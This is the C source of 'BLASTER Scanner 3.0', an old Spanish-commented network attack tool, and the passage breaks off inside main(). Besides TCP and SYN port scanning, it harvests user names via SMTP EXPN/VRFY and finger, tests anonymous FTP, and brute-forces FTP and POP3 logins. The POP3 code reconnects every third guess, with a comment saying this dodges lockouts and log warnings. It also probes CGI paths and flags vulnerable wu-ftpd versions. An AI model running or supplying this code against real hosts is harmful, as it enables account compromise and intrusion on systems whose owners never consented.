#include "include/device-ip.h"
#include "include/scana.h" /*libreria donde se definen todas las variables,etc */
#include "include/syn.h"
#include "include/ping.h"
#include "include/scan_tcp.h"

u_short rango1,rango2;
int fingop=0;
unsigned long resuelveip(char *hostname)
{
    struct hostent *hp;
      
	if((ap = inet_addr(hostname)) == -1)
             {
	        if((hp = gethostbyname(hostname)) == NULL)
	                 {
	                            printf("Can't resolve hostname <%s>.\n",hostname);
	                            exit(-1);
	                 }
			 memcpy(&ap,hp->h_addr,4);
	     }
    return ap;
   }

void linea(int k)
    {
        if(k==1)
	    {
              fprintf(salvar,"%s","=================================================================\n");
            }
       else {
	  printf("=================================================================\n");
            }
   
    }

/*Lee la ip almacenda*/
void lee()
{
	memset(device_ip,0x00,sizeof(device_ip));
        if((l=fopen("include/iptemp","r"))==NULL)
	    {
              printf("Imposible leer include/iptemp\n");
              exit(1);
            }
  
        fgets(buff,200,l);
        fclose(l);
        sprintf(device_ip,"%s",buff);
   
}	

/*Esta es una funcion que invente, para obtener la ip de distintos devices,
 * segun sea necesario. Existen otros metodos sin tener que ejecutar comandos
 * del sistema, pero se me ocurrio asi. 
 *Falta mejorarla un poco para algunas ip determinadas*/
int dame_ip(char device[20])
{

    int s;
   
        sprintf(comando,"ifconfig %s |grep inet > include/a",device);
        system(comando);
        k=fopen("include/a","r");
        l=fopen("include/iptemp","w");
        while(!feof(k))
	    {
	          n=getc(k);
	          if(n==':')
		      {
		          i=0;
		          while((b=getc(k)))
			      {
			       
			       putc(b,l);
			       if(b=='.')
			           {
				      i++;
				   }
			       
			       
			       if(i==3)
			           {
		 		      for(s=0;s<3;s++)
				          {
					    b=getc(k);	   
				            putc(b,l);
				          }
				      fclose(l);
				      lee();
				      return 1;
				 
				   }
			      }
		 }
	  }
   
        fclose(k);
        return 1;
}

/*Conectarse a determinado puerto*/
int conectar(puerto)
{
    fd_set readfs;
    int an=0;
    struct timeval timeout;

        sockete = socket(AF_INET, SOCK_STREAM, 0);
	target.sin_family = AF_INET;
        target.sin_port = htons(puerto);
	target.sin_addr.s_addr = ap;

        if (fcntl (sockete, F_SETFL, O_NONBLOCK) < 0)
	    {
              return -1;
            }
     
        timeout.tv_sec = atoi("18");
        timeout.tv_usec = 0;
        
	while(1)
	    {
           
	   	if(connect(sockete,(struct sockaddr *)&target,sizeof(struct sockaddr_in))<0)
		    {
 	               if (errno != EAGAIN && errno != EINPROGRESS) 
		           {
                                close(sockete); 
	                        return -1;
	 		   }
                    }
		else 
		    {
                       ctl_connection =0;
		    }	   
	   	  
	FD_ZERO(&readfs);
       	FD_SET(sockete, &readfs);	
        select(sockete+1, &readfs,NULL,NULL,&timeout);
	if(fingop!=1){
	   an=read(sockete,buffer,sizeof(buffer));
	}
	if(an>0)
	    {
                 return 1;
	    }
	     
	if(timeout.tv_sec == 0 && timeout.tv_usec == 0)
	    {
		if(lo==1)
		    {
			fprintf(salvar,"%s","*************Quizas el host esta usando algun metodo de control de acceso**********\n");
		    }
		printf("%s*************Quizas el host esta usando algun metodo de control de acceso**********%s\n",BRILLOSO,NORMAL);
		
		ctl_connection=1;
		close(sockete);
	     }
	}
  
    return 1;
}





/*Verifico que tipo de escaneo realizar y si utilizar ping o no*/
int inteli()
{


	len=strlen(buffer);
        for(i=(len-1);i!=-1;i--)
             {
		fprintf(archivo3,"%c",buffer[i]);
	     }
        fprintf(archivo2,"\n%s",buffer);
        fprintf(archivo2,"%s",buffer);
        fprintf(archivo3,"\n1234\n");
        fprintf(archivo2,"%s",buffer);
        fprintf(archivo3,"123456789\n");
        fprintf(archivo2,"%s",buffer);
        fprintf(archivo3,"%s",buffer);
return 0;
}



int temp()
{
   
        if(vrfye==1 && strstr(buf,"250")) 
	    {
              printf("%s%s%s", BRILLOSO,buf,NORMAL);
	      if(inteligente == 1) 
	          {   
                      inteli();
                  }
            }
        if (expne==1 && (strstr(buf,"252") || strstr(buf,"250")))
	    {
              if(lo==1)
	          {
           fprintf(salvar,"%s",buf);
                  }
              printf("%s%s%s", BRILLOSO,buf,NORMAL);
	      if(inteligente == 1)   /*verifico si utiliza la opcion inteligente*/  
                  {
                       inteli();
		  }
            }
/*Verifico si permite expn o vrfy*/
        if (strstr(buf,"502")) 
	    {
              if(lo==1)
	          {
                    fprintf(salvar,"%s","Expn no permitido\n");
                  }
              printf("Expn no permitido\n");
	      notallowed=1;
    	    }
        if(strstr(buf,"503")) 
	    {
              if(lo==1)
	          {
		    fprintf(salvar,"%s","Vrfy no permitido\n");
                  }
              printf("Vrfy no permitido\n");
	      notallowed=1;
	    }
return 0;
}

int caca(char state[100]) /*Funcion para comparar el puerto con una lista de puertos predeterminada,
              	he imprimir el nombre del servicio*/
{

   
    archivo3=fopen("puertos","r+");
        if((i==21 && i != -1 && !strstr(state,"filtrado"))) 
             {
	         sprintf(tempi1,"%s","yes");
	     }
   
        if((i==25 && i !=-1  && !strstr(state,"filtrado"))) 
	    {
	         sprintf(tempi,"%s","yes");
	    }
        if((i==110 && i !=-1 && !strstr(state,"filtrado"))) 
	    {
	         sprintf(tempi2,"%s","yes");
	    }
        if((i==79 && i !=-1 && !strstr(state,"filtrado"))) 
	    {
	         sprintf(tempi3,"%s","yes");
	    }

        while(fgets(buffer,maximo,archivo3) != NULL) 
	    {
                 sscanf(buffer, "%s %s %s",demonio,temporal,temporal);
	         if(strstr(buffer,port) ) 
		     {
                     if(lo==1) 
		         {
		          fprintf(salvar,"[%d] %s %s\n",i,demonio,state);         
		 	 }
                 printf("[%s%d%s] %s %s\n",VERDE,i,NORMAL,demonio,state);
                 return 0;       
		     }
           }
   
        if(lo==1)
	    {
		 fprintf(salvar,"[%d] unknown %s\n",i,state);
	         fclose(archivo3);
	    }
   
           printf("[%s%d%s] unknown %s\n",VERDE,i,NORMAL,state);
           fclose(archivo3);
           return 0;
    }



int doscan(unsigned long ap,int i)

{
    fd_set writefs;

    struct timeval timeout;
	
	sprintf(port,"%d",i);
        sockete = socket(AF_INET, SOCK_STREAM, 0);
	target.sin_family = AF_INET;
        target.sin_port = htons(i);
	target.sin_addr.s_addr = ap;
    
        if (fcntl (sockete, F_SETFL, O_NONBLOCK) < 0)
	    {
	      return -1;
            }
   
        timeout.tv_sec = atoi("7");
        timeout.tv_usec = 0;

        while(1)
	  {
             if(connect(sockete,(struct sockaddr *)&target,sizeof(struct sockaddr_in))<0)
	         {
                 	if(errno == ENETUNREACH)
			    {
			     perror("connect");
			     exit(1);
			    }
        		if (errno != EAGAIN && errno != EINPROGRESS) 
			    {
			     close(sockete);
	            	     return -1;
	                    }
      		}
	     else 
	        {
		       caca("abierto");
		       close(sockete);
		}
	  
	FD_ZERO(&writefs);
	FD_SET(sockete, &writefs);
	select(sockete+1,NULL,&writefs,NULL,&timeout);
	if(timeout.tv_sec == 0 && timeout.tv_usec == 0)
		{
	         filcontrol++;
		 if(filcontrol<9)
		     {
			caca("filtrado");
			close(sockete);
		     }
	        }
	    }
return 0;
}

int atack()
{
    archivo=fopen(userlist,"r+"); /*abro el archivo que contiene los usuarios*/
    archivo2=fopen("user","a+");
    archivo3=fopen("pass","a+");

	if(lo==1)
	    {   
              fprintf(salvar,"%s","Usuarios Encontrados:\n");
	    }
        printf("%sUsuarios Encontrados%s:\n",CELESTE,NORMAL);
        conectar(25);
        if(ctl_connection==1)
	    {
              return 1;
            }
        if (fcntl (sockete, F_SETFL, 0) < 0)
	    {
              return -1;
	    }  
   
        memset(buf,0x00,sizeof(buf));
      
        while(fgets(buffer,maximo,archivo) != NULL) 
	    {
              if(notallowed == 1)
	          {
	             return 1;
                  }
	 
              if (vrfye==1) 
	          { 
	 	     sprintf(temporal,"expn %s",buffer);
      
                  }
              else if (expne==1) 
	          {
	             sprintf(temporal,"vrfy %s",buffer);
                  }		
            write(sockete,temporal,strlen(temporal));
            read(sockete,buf,sizeof(buf));
            temp();
            memset(buf,0x00,sizeof(buf));
            }
        return 0;
        close(sockete);
        fclose(archivo);
        fclose(archivo2);
        fclose(archivo3);
	if(lo==1)
	    {   
               linea(1);
	    }
	linea(0);
return 0;
}

/*funcion para checkear accesso anonimo*/
int anon()
{
   
        conectar(21);
        if(ctl_connection==1)
	    {
               return 1;
	    }
        if (fcntl (sockete, F_SETFL, 0) < 0)
	    {
              return -1;
            } 
   // read(sockete,buffer,sizeof(buffer));
        sprintf(user,"%s","user anonymous\n");
        write(sockete,user,strlen(user));
        read(sockete,buffer,sizeof(buffer));
        memset(buffer,0x00,sizeof(buffer));
        sprintf(pass,"%s","pass aa@usa.com\n");
        write(sockete,pass,sizeof(pass));
        read(sockete,buffer,sizeof(buffer));

   /*verifico si guardo logs, y si permite o no accesso anonimo*/
        if (strstr(buffer,"230")) 
	    {
               if(lo==1)
	           {
	              fprintf(salvar,"%s","Acceso Anonimos permitido\n");
                   }
	       printf("%sAcceso Anonimos permitido%s\n",ROJO,NORMAL);
            }
        else 
	    {
              if(lo==1)
	          {
	             fprintf(salvar,"Acceso Anonimos prohibido\n");
                  }
               printf("%sAcceso Anonimos prohibido%s\n",CELESTE,NORMAL);
            }
	if(lo==1)
	    {
               linea(1);
	    }
        linea(0);
       close(sockete);
return 0;
}

/*Sacar usuarios mediante finger*/
int fingatack()
     {
	archivo=fopen(userlist,"r+");
fingop=1;	
	if(archivo==NULL)
	    {
               printf("error al abrir el archivo");
	       return 1;
	    }
       memset(buffer,0x00,sizeof(buffer));	       
	while((fgets(user,maximo,archivo))!=NULL){
	  
	       conectar(79);
               if(ctl_connection==1)
	           {
                       return 1;
		   }
	       if (fcntl (sockete, F_SETFL, 0) < 0)
	           {
                       return -1;
                   }
	       write(sockete,user,strlen(user));
               read(sockete,buffer,sizeof(buffer));
	       if(!strstr(buffer,"such user")) 
	           {
                   if(lo==1) 
		       {
                          fprintf(salvar,"%s\n",buffer);
                       }
                
		      printf("%s\n",buffer);
                   }
	       
	       
	       
	       close(sockete);
               sleep(1);
	       memset(user,0x00,sizeof(user));
	       memset(buffer,0x00,sizeof(buffer));
	       // sin esta espera, provocariamos un denial of service en el servicio utilizado, debido a multiples conexiones*/

	    }
	fingop=0;
	close(sockete);
	fclose(archivo);
return 0;
     }
/*Fuerza bruta por ftp*/
int bruteftp()
{
        archivo=fopen(userlist,"r");
        archivo2=fopen(passlist,"r");
   
        if((archivo == NULL) || (archivo2 == NULL))
	    {
              printf("Error opening the file\n");
              exit(0);
            }
   
        conectar(21);
        if(ctl_connection==1)
	    {
             return 1;
	    }
        if (fcntl (sockete, F_SETFL, 0) < 0)
	    {
             return -1;
            }
        i=0;
	if(lo==1)
	    {
              fprintf(salvar,"Passwords cracking........");
              fprintf(salvar,"%s","\"guesses\"passwords:\n");
	    }
              printf("%sPasswords cracking........%s",BRILLOSO,NORMAL);
	      printf("\"guesses\"passwords:\n");
     
        while(fgets(user,maximo,archivo) && fgets(pass,maximo,archivo2) !=NULL) 
	    {
          	{
	      i++;
	      sprintf (buffer, "user %s",user);
	      write (sockete, buffer, strlen (buffer));
	      read (sockete, buf, 1023);
	      memset(buffer,0x00,sizeof(buffer));
	      sprintf (buffer, "pass %s",pass);
	      write (sockete, buffer, strlen (buffer));
	      sleep (1);
	      read (sockete, buffer, sizeof (buffer));
	   
	   if (strstr(buffer,"230"))
	       {
	         if(lo==1) 
		     {
			fprintf(salvar,"\nUSER:%s\r\rPASS:%s",user,pass);
	             }
	       printf("\nUSER:%s\r\rPASS:%s",user,pass);
	       close(sockete);
	       conectar(21);
	       if (fcntl (sockete, F_SETFL, 0) < 0)
	           {
                      return -1;
                   }
	       }
	       if (i==5) 
	           {
	              close(sockete);
                      conectar(21);
	       if (fcntl (sockete, F_SETFL, 0) < 0)
	              {
                          return -1;
                      }	      
	           }
	}
   }
        if(lo==1)
	    {
              linea(1);
            }
        linea(0);
        close(sockete);
        fclose(archivo);
        fclose(archivo2);
return 0;
}





/*Escaneo de cgi*/
int cgiscan()
{

   char bof[1024];
   char bif[1024];
    archivo=fopen("cgi","r+");
fingop=1;
   
	if(ctl_connection==1)
	    {
               return 1;
	    }
        
        if(lo==1) 
	    {
              fprintf(salvar,"%s","CGi's Encontrados:\n");
            }
        printf("CGi's Encontrados:\n");
        while(fgets(bof,maximo,archivo) != NULL) 
	    {
        conectar(80);
        if (fcntl (sockete, F_SETFL, 0) < 0)
	    {
              return -1;
            }
	      sprintf(buf,"%s\n",bof);
              write(sockete,buf,strlen(buf));
              read(sockete,buffer,20);
      /*Verifico si esta o no*/
              if(strstr(buffer,"200"))
		{
	           sscanf(buf,"%s %s %s",temporal,bif,temporal);
	           if(lo==1)
		       {
	      	           fprintf (salvar,"%s\n",bif);
	               }
	           printf ("%s%s%s\n",BRILLOSO,bif,NORMAL);
		}
	close(sockete);
        sleep(1);
        memset(buffer,0x00,sizeof(buffer));
        memset(bof,0x00,sizeof(bof));
	memset(buf,0x00,sizeof(buf));
	memset(bif,0x00,sizeof(bif));    
	}
     close(sockete);
   fclose(archivo);
fingop=0;    
return 0;
}

int scan_port(unsigned short port1, unsigned int src_addr, unsigned int dst_addr){
//defino estructuras
    struct timeval timeo;
    fd_set readfs;
    int l;   
    struct tcphdr tcpp;
    struct recv_tcp
     {
	      struct iphdr ip;
	      struct tcphdr tcp;
	      unsigned char blah[65535];
     }recv_tcp;
    struct pseudo_header
     {
	      unsigned int source_address;
	      unsigned int dest_address;
	      unsigned char placeholder;
	      unsigned char protocol;
	      unsigned short tcp_length;
	      struct tcphdr tcp;
     }pseudo_header;
    int tcp_socket;
    struct sockaddr_in sin;
    int sinlen;
    static int blah = 0;
  
	blah++;
   //armado del paquete tcp*//
        tcpp.source = getpid() + blah;
        tcpp.dest = htons(port1);
        tcpp.seq = getpid() + blah;
        tcpp.ack_seq = 0;
        tcpp.res1 = 0;
        tcpp.doff = 5;
        tcpp.res2 = 0;
        tcpp.fin = 0;
        tcpp.syn = 1;
        tcpp.rst = 0;
        tcpp.psh = 0;
        tcpp.ack = 0;
        tcpp.urg = 0;
        tcpp.window = htons(512);
        tcpp.check = 0;
        tcpp.urg_ptr = 0;
   //armo la estructura pseudo*/
        pseudo_header.source_address = src_addr;
        pseudo_header.dest_address = dst_addr;
        pseudo_header.placeholder = 0;
        pseudo_header.protocol = IPPROTO_TCP;
        pseudo_header.tcp_length = htons(20);
        bcopy(&tcpp, &pseudo_header.tcp, 20);
        tcpp.check = in_cksum((unsigned short *)&pseudo_header, 32);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(port1);
        sin.sin_addr.s_addr = dst_addr;
        sinlen=sizeof(sin);

        tcp_socket = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
        sprintf(port,"%d",port1);
        if(tcp_socket < 0)
             {
	       fprintf(stderr, "couldnt open raw socket\n");
	       exit(1);
             }
   /*lo envio*/
        if (fcntl (tcp_socket, F_SETFL, O_NONBLOCK) < 0)
	     {
               perror("fcntl");
               exit(1);
             }
        sendto(tcp_socket, &tcpp, 20, 0, (struct sockaddr *)&sin, sinlen);
        syn_timeout = 0;
   
        while(1)
	    {
	    FD_ZERO(&readfs);
    	    FD_SET(tcp_socket, &readfs);
	    timeo.tv_sec = atoi("7");
            timeo.tv_usec = 0;
	    select(tcp_socket+1,&readfs,NULL,NULL,&timeo);
	    l=read(tcp_socket, (struct recv_tcp *)&recv_tcp, 65535);
	
	if(l<0)
	    {
	    filcontrol++;
	    if(filcontrol <= 9)
		{
	           caca("filtrado");
	           close(sockete);
	           return 1;
	        }
	    }
	if(syn_timeout == 1) 
	    {
		    close(tcp_socket);
		    syn_timeout=0;
		    return -1;
	    }
	 if(recv_tcp.tcp.dest == (getpid() + blah))
	      {
	            close(tcp_socket);
		    if(recv_tcp.tcp.rst == 1) return 0;
		    caca("abierto");
		    close(sockete);
	            return 1;
	      }
    	}
}

/*Checksum*/
unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
           register long           sum;            /* assumes long == 32 bits */
           u_short                 oddbyte;
           register u_short        answer;         /* assumes u_short == 16 bits *$
						    
							       *          * Our algorithm is simple, using a 32-bit accumulator (sum),
							       *          * we add sequential 16-bit words to it, and at the end, fold back
							       *          * all the carry bits from the top 16 bits into the lower 16 bits.
							       *          */
						      
             sum = 0;
           while (nbytes > 1)  {
	                      sum += *ptr++;
	                      nbytes -= 2;
	   }
   
                                   /* mop up an odd byte, if necessary */
           if (nbytes == 1) {
	                      oddbyte = 0;            /* make sure top half is zero */
	                      *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
	                      sum += oddbyte;
	   }
   
           /*
	    *          * Add back carry outs from top 16 bits to low 16 bits.
	    *          */
   
           sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
           sum += (sum >> 16);                     /* add carry */
           answer = ~sum;          /* ones-complement, then truncate to 16 bits */
           return(answer);
}


/*Fuerza Bruta en POP3*/
int popatack()
{
    int b=0;
    if((archivo=fopen(userlist,"r+"))==NULL)
	{
           printf("error al abrir el userlist\n");
           return 1;
	}
    if((archivo2=fopen(passlist,"r+"))==NULL)
	{
           printf("error al abrir el password-list\n");
	   return 1;
	}
    
        conectar(110);
        if(ctl_connection==1)
	    {
               return 1;
	    }   
        if (fcntl (sockete, F_SETFL, 0) < 0)
	    {
              return -1;
	    }	  

        while(fgets(buffer,200,archivo) && fgets(buf,200,archivo2) != NULL) 
	    {
              b++;
              sprintf(pol,"USER %s",buffer);
              sprintf(pul,"PASS %s",buf);
              write(sockete,pol,strlen(pol));
              read(sockete,temp2,sizeof(temp2));
              write(sockete,pul,strlen(pul));
              read(sockete,temp1,sizeof(temp1));
      
            if(strstr(temp1,"open")) 
		{
	           if(lo==1)
		       {         
		          fprintf(salvar,"%s %s",pol,pul);
	               }
	       
	    	   printf("%s %s",pol,pul);
	           close(sockete);
	    	   conectar(110);
	    if (fcntl (sockete, F_SETFL, 0) < 0)
		{
                  return -1;
                } 
	    b=0;
	       
	    }
   
            memset(pul,0x00,sizeof(pul));
            memset(pol,0x00,sizeof(pol));

/*si es el tercer intento , reconectarse. Esto es debido a que la mayoria
 de los servicios pop3, luego del tercer intento no "chekean" si el usuario y el password es correcto
 y guardan en los log un mensaje de Logins exesivos*/
            if(b==3) 
		{
	          
	         close(sockete);  
	         conectar(110);
	    	 if (fcntl (sockete, F_SETFL, 0) < 0)
		     {
                          return -1;
                     }        	               
		 b=0;
                }
       }
   
   
        close(sockete);
	fclose(archivo);
        fclose(archivo2);
return 0;
}



/*realizar un ping a los hosts*/
int pong(char *al)
{

	if (device==1)
	    {

               dame_ip(devi);
	    }
	else if(device==0)
	    {
                 if((strstr(al,"192.168.1"))||(strstr(al,"10.10.10")) ||(strstr(al,"192.168.0")) ||(strstr(al,"127.0.0.1"))||(strstr(al,"localhost")))
		     {
		             dame_ip(eth);
           	     }

							
		else {
                             dame_ip(ppp);
		     }
	    }
        resuelveip(al);
	if(lo==1)
	    {
                  fprintf(salvar,"Checkeando si el host recibe nuestros pings... %s\n", al);
	    }
	printf("Checkeando si el host recibe nuestros pings... %s\n", al);
        ping(inet_addr(device_ip),ap);
        if(resul==0 && us!=1)
	    {
	         if(lo==1)
		     {
                          fprintf(salvar,"%s","El host no responde, si el host esta online prube usando la opcion p\n");
	             }
        printf("El host no responde, si el host esta online preba usando la opcion p\n");
        return 0; 	        
	    }
	else if(resul==0 && us==1) 
	    {
		return 0;
	    }
   
return 0;   
}

int wu_scan()
{
    int con=0;
    char ruffer[200];
        conectar(21);
   
        if (strstr(buffer, "wu-2.4.2")) 
	    {
	          memset(ruffer, '\0', strlen(ruffer));
	          strcpy(ruffer, "Version  ]--> wu-2.4.2\n");
	          con++;
	    
            }
        if (strstr(buffer, "Version wu-2.4.2-academ[BETA-1")) 
	    {
	          memset(ruffer, '\0', strlen(ruffer));
	          strcpy(ruffer, "]--> Posible version vulnerable del wu-2.4.2\n");
	          con++;
            }
        if (strstr(buffer, "wu-2.6.0(1)")) 
	    {
	          memset(ruffer, '\0', strlen(ruffer));
	          strcpy(ruffer, "Version  ]--> wu-2.6.0(1)\n");
	          con++;
            }
        if ((strstr(buffer, "Mon Feb 28")) || (strstr(buffer, "Wed Aug 9"))) 
	    {
	          memset(ruffer, '\0', strlen(ruffer));
	          strcpy(ruffer, "]--> Posible version vulnerable del wu-2.6.0(1)\n");
	          con++;
            }
        if (strstr(buffer, "wu-2.6.1")) 
	    {
	          memset(ruffer, '\0', strlen(ruffer));
	          strcpy(ruffer, "Version  ]--> wu-2.6.1\n");
	          con++;
            }
	if(con != 0)
	    {
		  if(lo==1)
		      {
                           linea(1);
			   fprintf(salvar,"WU-FTP scan:              %s",ruffer);  
		      }
        linea(0);
   
        printf("%sWU-FTP scan:%s              %s%s%s",BRILLOSO,NORMAL,CELESTE,ruffer,NORMAL);

}
        else if (con==0)
	    {
              if(lo==1)
	          {
	             fprintf(salvar,"%s","La version de FTP no es WU\n");
                  }
        printf("La version de FTP no es WU\n");
       }
	close(sockete);
 
   memset(buffer,0x00,sizeof(buffer));
return 0;
} 
void continuar()
{
   /*Segun las opciones elejidas y si el puerto requerido estaba abierto...*/
        if((expne==1 || vrfye==1) && (strstr(tempi,"yes"))) 
	    {
               if(expne==1) 
	           {
		    if(lo==1) 
			{
                           linea(1);
			   fprintf(salvar,"%s","Sacando usuarios mediante vrfy\n");
	                   linea(1);
			}
	       linea(0);
	       printf("%sSacando usuarios mediante %svrfy%s\n",CELESTE,ROJO,NORMAL);
	       linea(0);
            }
	if (vrfye==1) 
	    {
	     if(lo==1)
	         {
		   linea(1); 
		   fprintf(salvar,"%s","Sacando usuarios mediante expn\n");
		   linea(1);
	         }
	  linea(0);
	  printf("%sSacando usuarios mediante %sexpn%s\n",CELESTE,ROJO,NORMAL);
	  linea(0);
	    }
	atack();
         }
      
        if((expne==1 || vrfye==1) && (inteligente == 1)) 
	    {
	    if(lo==1)
		{
		fprintf(salvar,"%s","El programa va a crear dos archivos:");
		fprintf(salvar,"%s","user (user list) y pass (passwords-list)");
		}

	   printf("\n%sEl programa va  acrear dos archivos:%s\n",ROJO,NORMAL);
	   printf("%suser (user list) y pass (passwords-list)%s\n",BRILLOSO,NORMAL);
	   }
      
        if((pop==1) && (strstr(tempi2,"yes")))
	    {
            if(lo==1)
		{
                  linea(1);   
                  fprintf(salvar,"%s","Fuerza Bruta por  POP3\n");
                  linea(1);
	        }
        linea(0);   
        printf("%sFuerza Bruta por  POP3 %s\n",CELESTE,NORMAL);
        linea(0);
	popatack();
      }
      
        if((ftpba==1) && (strstr(tempi1,"yes"))) 
	    {
              if(lo==1)
	          {
		    linea(1);
                    fprintf(salvar,"%s","Chequeando Acceso Anonimo\n");
	            linea(1);
	          }
              linea(0);
              printf("Chequeando Acceso Anonimo\n");
              linea(0);
	      anon();
           }
   
        if((ftpb==1) && (strstr(tempi1,"yes"))) 
	    {
		 if(lo==1) 
		     {
    	                 linea(1);
                         fprintf(salvar,"%s","Fuerza Bruta por FTP\n");
                         linea(1);
	             }
	         linea(0);
                 printf("%sFuerza Bruta por FTP%s\n",AZUL,NORMAL);
                 linea(0);
	         bruteftp();
            }
   
        if(cgi==1) 
	    {
		if(lo==1)
		    {
                       linea(1);
		       fprintf(salvar,"%s","CGI SCAN:\n");
		       linea(1);
		    }
	linea(0);
	printf("%sCGI SCAN%s:\n",ROJO,NORMAL);
	linea(0);
	cgiscan();
   }

	if(wu==1 && strstr(tempi1,"yes"))
     	    {
               wu_scan();
	    }
   
        if(finge==1 && strstr(tempi3,"yes")) 
	    {
              if(lo==1) 
	          {
                      linea(1);
		      fprintf(salvar,"%s","Extraer usuarios mediante FINGER:\n");
		      linea(1);
                  }
	linea(0);
	printf("%sExtraer usuarios mediante FINGER%s:\n",ROJO,NORMAL);
	linea(0);
        fingatack();
	    }

}


/*Primera Parte del syn scan*/
int pre_scan(unsigned long ap,char *hos)
	  {
  /*Verifico si tengo que guardar un log*/
	if(lo==1) 
	    {
	        linea(1);
	        fprintf(salvar,"Escaneando HOST (SYN SCAN): %s\n",hos);
	        fprintf(salvar,"%s","Puertos abiertos....\n");
		linea(1);
	    }
	        linea(0);
		printf("%sEscaneando HOST (SYN SCAN): %s %s\n",VERDE,hos,NORMAL);
		printf("%sPuertos abiertos....%s\n",VERDE,NORMAL);
		linea(0);
	
	     /*Verifico la ip a tomar*/
	if(device==0)
	    {
		if((strstr(hos,"192.168.1"))||(strstr(hos,"10.10.10")) ||(strstr(hos,"192.168.0")) || (strstr(hos,"127.0.0.1"))||(strstr(hos,"localhost"))){
		dame_ip(eth);
		       
	    }
	else 
	    {
    	        dame_ip(ppp);
	    }
    }
	else if (device==1)
	    {
	       dame_ip(devi);
	    }
	     
	for(i=(rango1-1);i<rango2;i++)
	    {
               puerto=i;
	       sprintf(port,"%d",i);
	       scan_port(i,inet_addr(device_ip),ap);
  	    }
	  
	if(filcontrol >= 9)
	    {	
	    if(lo==1)
		{
	       fprintf(salvar,"%s","Asumiendo que el resto de los puertos estan filtrados\n");
		}
               printf("Asumiendo que el resto de los puertos estan filtrados\n");
	    }
   continuar();
return 0;
	  }
int tcpscan(unsigned long ap,char *hos)
    {
        if(lo==1) 
	    {
                 linea(1);
                 fprintf(salvar,"Escaneando HOST (TCP SCAN): %s\n",hos);
	         fprintf(salvar,"%s","Puertos Abiertos....\n");
                 linea(1);
            }
        linea(0);
        printf("%sEscaneando HOST (TCP SCAN): %s %s\n",VERDE,hos,NORMAL);
        printf("%sPuertos Abiertos....%s\n",VERDE,NORMAL);
        linea(0);
	if(no_options==1)  /*Si puso ip/host en seguundo argumento, escaneo simple del port 0 al 6003*/
           {
                 rango1=0;
                 rango2=6003;
	   }   
 
   for(i=(rango1-1);i<(rango2+1); i++)   /*lop para empezar el scan de puertos */
	{
                 doscan(ap,i);
        }
   if(filcontrol>=9)
        {
	if(lo==1)
	    {
           fprintf(salvar,"%s","Asumiendo que el resto de los puertos esta filtrado\n");
	    }
       printf("Asumiendo que el resto de los puertos estan filtrado\n");
	}
  continuar();
return 0;
    }

     
void fina(void)
{
    linea(0);

	if(lo==1)
	    {
               linea(1);
	       fprintf(salvar,"%s","Scaneo finalizado\n");
	       fclose(salvar);
            }

        printf("Scaneo Finalizado\n ");
}

void menus()
{
	printf("%sBLASTER Scanner [ver 3.0]%s\n",ROJO,NORMAL);
        printf("%sauthor: polos                   e-mail: thebigsnake@usa.net%s\n",AZUL,NORMAL);
        printf("Use:\n");
        printf("%s./blaster l-port h-port options host -o userlist passlist%s\n",BRILLOSO,NORMAL);
	printf("%s./blaster ip/host to do a simple scan%s\n\n",BRILLOSO,NORMAL);
        printf("%ss%s: SYN SCAN, (half-open connection\n",BRILLOSO,NORMAL);
        printf("%se%s: extrae usuarios mediante expn (requires -o userlist)\n",BRILLOSO,NORMAL);
        printf("%sy%s: extrae usuarios mediante vrfy (requires -o userlist\n",BRILLOSO,NORMAL);
        printf("%si%s: Creador \"Inteligente\" de user-password list\n",BRILLOSO,NORMAL);
        printf("%sf%s: Fuerza Bruta por Ftp(requiere userlist and password-list)\n",BRILLOSO,NORMAL);
        printf("%st%s: Fuerza Bruta por pop3(requiere userlist and password-list)\n",BRILLOSO,NORMAL);
        printf("%sa%s: Checkea accesso  (ftp)\n",BRILLOSO,NORMAL);
        printf("%sk%s: Extrae usuarios por finger\n",BRILLOSO,NORMAL);
        printf("%sp%s: NOT Ping Hosts\n",BRILLOSO,NORMAL);
        printf("%sn%s: Scan a subnet (ej: 192.168.1)\n",BRILLOSO,NORMAL); 
        printf("%sl%s: Create a log File\n",BRILLOSO,NORMAL);
        printf("%sd%s: Select a ip device for do the scan if you have problems (ppp0,eth0,eth1,etc)\n",BRILLOSO,NORMAL);
        printf("%so%s: user-list password-list\n",BRILLOSO,NORMAL);
        printf("%sw%s: Wu-ftp scan\n",BRILLOSO,NORMAL);
        printf("\n%sman blaster for more information%s\n",BRILLOSO,NORMAL);
        exit(1);
}





void kill_signal(int sign)
{
        switch(sign){
      
	    case SIGHUP:
              fprintf(stderr,"SIGUP Signal, finalizando...\n");
              break;;
    
	    case SIGINT:
              fprintf(stderr,"SIGINT signal, finalizando...\n");
              break;;
    
	    case SIGQUIT:
              fprintf(stderr,"SIGQUIT signal, finalizando...\n");
              break;;
                    }
       fflush(stdout);
       if(lo==1)
           {
              fclose(salvar);
           }
       shutdown(sockete,2);
       exit(1);
}

void system_check(void)
{
    if((archivo=fopen("cgi","r+"))==NULL)
	{
           printf("Error al abrir el archivo cgi\n");
           exit(1);
	}
 
    if((archivo3=fopen("puertos","r+"))==NULL)
	{
           printf("Error al abrir el archivo puertos\n");
           exit(1);
	}
        fclose(archivo);
        fclose(archivo3);
}

void verifica3(char *ele)
{
        if(sy==0) 
	    {
	       resuelveip(ele);
	       if(pini==1) 
	           {
                     pong(ele);
		     if(resul==1)
		         {
 	                   tcpscan(ap,ele);
	                 }
		   }
		else 
		   { 
	             tcpscan(ap,ele);
		   }
      
            }
        if(sy==1)
            {
		     resuelveip(ele);
		     if(pini==1) 
		        {
			   pong(ele);
                           if(resul==1) 
			       {
                  	        pre_scan(ap,ele);
			       }
			}
		     else 
			{			 
	                         pre_scan(ap,ele);
			}
	    }	
 }
int main(int argc, char *argv[]) /*declaro las variables para argumentos */

{
putenv(envi); /*eviroment definido en las .h, para mas "seguridad", cuando
	       * utilizo comandos del sistema*/

if(argc < 2) {          /*si no ingresa ingun argumento... */
		menus();      
             }
   /*Declaro las opciones segun el argumento "3" */

/*Escaneo Simple*/
   if(argc==2 && ((strstr(argv[1],"www"))||(strstr(argv[1],"."))||(strstr(argv[1],"localhost"))))
    {
	no_options=1;
	sprintf(argv[4],"%s",argv[1]);
    }

if(argc<4 && no_options!=1)
    {
        printf("Ingrese algun opcion o utilize un 0 para un scan simple\n");		
	exit(1);
    }
